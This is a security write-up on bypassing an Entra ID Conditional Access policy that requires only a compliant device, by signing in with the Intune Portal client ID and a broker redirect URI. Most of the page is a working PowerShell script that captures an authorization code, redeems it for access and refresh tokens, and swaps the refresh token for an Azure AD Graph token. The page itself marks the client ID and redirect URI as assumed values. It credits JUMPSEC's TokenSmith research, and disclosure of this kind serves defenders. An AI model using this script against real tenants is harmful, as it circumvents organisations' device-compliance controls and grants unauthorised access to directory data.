A Conditional Access policy in Entra ID that requires only a compliant device can be bypassed by authenticating with the Intune Portal client ID and a special redirect URI.
Note that any other Conditional Access Policies and conditions you’ve configured in your tenant will still apply!
- Execute the script.
- Open the browser developer tools and authenticate normally.
- After clicking "Continue" you should see an error message in the browser console.
- Click the URL in the browser console (ms-appx-web://...); this opens it in a new tab. Copy the value of the code parameter into the script window. This gets you an access token and a refresh token (stored in $token).
The refresh token can then be used to obtain an access token for other resources, for example for Azure AD Graph using https://github.com/zh54321/EntraTokenAid.git.
Update, February 2024: Microsoft changed the scopes pre-consented for this client on the Azure AD Graph API (user_impersonation --> Service_PrincipalEndpoint.Read.All,User.Read). Tools that need user_impersonation on Azure AD Graph, such as ROADrecon, therefore no longer work with these tokens.
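The steps above, plus the refresh-token exchange for Azure AD Graph, as an added PowerShell example; this is not the page's script and not TokenSmith's code. The client ID, the redirect URI and the default tenant value are assumptions (the page does not print them): the GUID is the one commonly cited for the Intune Company Portal client and the redirect URI is the matching broker URI, so verify both against the TokenSmith write-up before relying on them. The token endpoints, parameters and JWT layout are standard OAuth 2.0 / Entra ID.

```powershell
# Added example, not the page's script or TokenSmith's code.
# ASSUMED values (not printed on the page; check the TokenSmith write-up):
$Tenant      = 'organizations'                                        # or your tenant ID / verified domain
$ClientId    = '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223'                  # assumed: Intune (Company) Portal client ID
$RedirectUri = "ms-appx-web://Microsoft.AAD.BrokerPlugin/$ClientId"   # assumed: the "special" redirect URI
$Scope       = 'openid profile offline_access https://graph.microsoft.com/.default'

function Get-AuthorizeUrl {
    # Build the URL to open in the browser. After sign-in the browser cannot load the
    # ms-appx-web:// redirect, so the console shows the full redirect URL including ?code=...
    param([string]$State = ([guid]::NewGuid().Guid))
    $q = @{
        client_id     = $ClientId
        response_type = 'code'
        redirect_uri  = $RedirectUri
        scope         = $Scope
        response_mode = 'query'
        state         = $State
    }
    $query = ($q.GetEnumerator() | ForEach-Object { "$($_.Key)=$([uri]::EscapeDataString($_.Value))" }) -join '&'
    "https://login.microsoftonline.com/$Tenant/oauth2/v2.0/authorize?$query"
}

function Get-CodeFromRedirect {
    # Accepts either the whole ms-appx-web://...?code=... URL copied from the console or just the code value.
    param([Parameter(Mandatory)][string]$RedirectUrl)
    if ($RedirectUrl -match '[?&]code=([^&\s]+)') { return [uri]::UnescapeDataString($matches[1]) }
    return $RedirectUrl.Trim()
}

function Get-TokenFromCode {
    # Redeem the authorization code. redirect_uri must match the authorize request exactly.
    param([Parameter(Mandatory)][string]$Code)
    $body = @{
        client_id    = $ClientId
        grant_type   = 'authorization_code'
        code         = $Code
        redirect_uri = $RedirectUri
        scope        = $Scope
    }
    Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/$Tenant/oauth2/v2.0/token" `
        -ContentType 'application/x-www-form-urlencoded' -Body $body
}

function Get-TokenFromRefresh {
    # Swap the refresh token for an access token to another resource, here Azure AD Graph.
    # Since February 2024 the scopes pre-consented on Azure AD Graph for this client no longer
    # include user_impersonation, so expect a narrower token than ROADrecon needs.
    param([Parameter(Mandatory)][string]$RefreshToken,
          [string]$ResourceScope = 'https://graph.windows.net/.default offline_access')
    $body = @{
        client_id     = $ClientId
        grant_type    = 'refresh_token'
        refresh_token = $RefreshToken
        scope         = $ResourceScope
    }
    Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/$Tenant/oauth2/v2.0/token" `
        -ContentType 'application/x-www-form-urlencoded' -Body $body
}

function ConvertFrom-Jwt {
    # Decode the JWT payload (no signature check) to inspect claims such as aud, appid, scp, amr and deviceid.
    param([Parameter(Mandatory)][string]$Token)
    $payload = $Token.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
    [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}

# Usage, following the steps above:
Start-Process (Get-AuthorizeUrl)                                                        # sign in with dev tools open
$pasted = Read-Host 'Paste the ms-appx-web URL or the code parameter from the console'  # after the console error
$token  = Get-TokenFromCode -Code (Get-CodeFromRedirect $pasted)
ConvertFrom-Jwt $token.access_token | Select-Object aud, appid, scp, amr, deviceid      # no deviceid: no compliant device was involved
$aadGraph = Get-TokenFromRefresh -RefreshToken $token.refresh_token
ConvertFrom-Jwt $aadGraph.access_token | Select-Object aud, scp                         # shows the narrowed Azure AD Graph scopes
```

The decoded claims are the quickest check of what you actually got: a token for this client carries no deviceid claim because no compliant device took part, and the scp claim on the Azure AD Graph token shows the post-February-2024 scopes rather than user_impersonation. Any other Conditional Access policy in the tenant (MFA, location, sign-in risk) still applies at the authorize step, exactly as the note above says.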
- For the write-up: TokenSmith – Bypassing Intune Compliant Device Conditional Access by JUMPSEC
- For discovery and sharing:
  - TEMP43487580 (@TEMP43487580)
  - Dirk-jan (@_dirkjan)